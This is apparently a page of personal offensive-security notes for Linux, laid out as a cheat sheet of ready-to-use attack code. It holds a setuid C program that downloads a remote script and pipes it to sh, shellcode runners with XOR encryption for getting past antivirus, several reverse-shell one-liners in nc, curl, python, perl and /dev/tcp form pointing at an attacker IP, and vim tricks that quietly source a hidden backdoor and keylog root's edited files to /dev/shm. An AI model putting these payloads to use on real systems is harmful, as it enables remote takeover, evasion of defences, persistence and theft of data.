xct's notes
Search…
Linux

Binary Stage Zero

1
#include<stdio.h>
2
#include <stdlib.h>
3
#include <unistd.h>
4
5
int main() {
6
setuid(0);
7
setgid(0);
8
system("curl <ip>/run.txt|sh");
9
return 0;
10
}
Copied!

Shellcode Runner

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <unistd.h>
4
5
unsigned char buf[] = "..."
6
7
int main (int argc, char **argv) {
8
int (*ret)() = (int(*)())buf;
9
ret();
10
}
Copied!
Compile with gcc -o sc sc.c -z execstack . It might be useful to add some shellcode encryption to bypass AV (caesar, xor, aes,..).

Encrypt

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <unistd.h>
4
5
unsigned char buf[] = "..."
6
7
int main (int argc, char **argv) {
8
char key = 'X';
9
int len = (int) sizeof(buf);
10
for (int i=0; i<len ; i++) {
11
printf("\\x%02X",buf[i]^key);
12
}
13
return 0;
14
}
Copied!

Encrypted Runner

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <unistd.h>
4
5
unsigned char buf[] = "..."
6
7
int main (int argc, char **argv) {
8
char key = 'X';
9
int len = (int) sizeof(buf);
10
for (int i=0; i<len-1 ; i++) {
11
buf[i] = buf[i]^key;
12
}
13
int (*ret)() = (int(*)())buf;
14
ret();
15
}
Copied!

Shell nc reverse

1
touch /tmp/x; rm /tmp/x; mkfifo /tmp/x; cat /tmp/x | /bin/sh -i 2>&1 | nc $LHOST $LPORT > /tmp/x
Copied!

Shell curl reverse

1
curl -sNkT . http://$LHOST:$LPORT </dev/fd/3| sh 3>&-;} 3>&1|:
Copied!

Shell shell.now.sh

1
# Reverse Shell as a Service
2
# https://github.com/lukechilds/reverse-shell
3
#
4
# 1. On your machine:
5
# nc -l 1337
6
#
7
# 2. On the target machine:
8
# curl https://shell.now.sh/yourip:1337 | sh
9
#
10
# 3. Don't be a dick
11
12
if command -v python > /dev/null 2>&1; then
13
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.9.0.194",443)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
14
exit;
15
fi
16
17
if command -v perl > /dev/null 2>&1; then
18
perl -e 'use Socket;$i="10.9.0.194";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
19
exit;
20
fi
21
22
if command -v nc > /dev/null 2>&1; then
23
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.0.194 443 >/tmp/f
24
exit;
25
fi
26
27
if command -v sh > /dev/null 2>&1; then
28
/bin/sh -i >& /dev/tcp/10.9.0.194/443 0>&1
29
exit;
30
fi
Copied!

VIM Backdoor

To run vim with the user environment when sudo is used, we can add an alias to .bashrc:
1
alias sudo="sudo -E"
Copied!

Silently source custom script (add to .vimrc)

1
:silent !source ~/.notabackdoor
Copied!

Add Keylogger

Create vim plugin in ~/.vim/plugins:
1
:autocmd BufWritePost * :silent :w! >> /dev/shm/keylog.txt
Copied!
Alternatively if you want to only log files edited by root:
1
:if $USER == "root"
2
:autocmd BufWritePost * :silent :w! >> /dev/shm/keylog.txt
3
:endif
Copied!
Last modified 7mo ago